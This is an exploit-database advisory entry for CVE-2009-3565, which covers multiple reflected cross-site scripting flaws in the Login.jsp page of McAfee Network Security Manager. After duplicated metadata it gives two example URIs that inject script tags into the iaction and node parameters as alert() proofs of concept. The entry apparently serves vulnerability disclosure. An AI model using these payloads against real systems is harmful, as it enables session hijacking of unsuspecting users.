McAfee Network Security Manager < 5.1.11.8.1 - Multiple Cross-Site Scripting Vulnerabilities
| EKU-ID: 17726 | CVE: CVE-2009-3565;OSVDB-59911 | OSVDB-ID: |
| Author: Daniel King | Published: 2009-11-12 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 17726 | CVE: CVE-2009-3565;OSVDB-59911 | OSVDB-ID: |
| Author: Daniel King | Published: 2009-11-12 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
Attackers can exploit these issues by enticing an unsuspecting victim into following a malicious URI.
The following example URIs are available:
https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb14"><script>alert('XSS')</script>8b3283a1e57
https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=8502a"><script>alert(1)</script>2aa99b60533&iaction=precreatefcb14"><script>alert(â??XSSâ??)</script>8b3283a1e57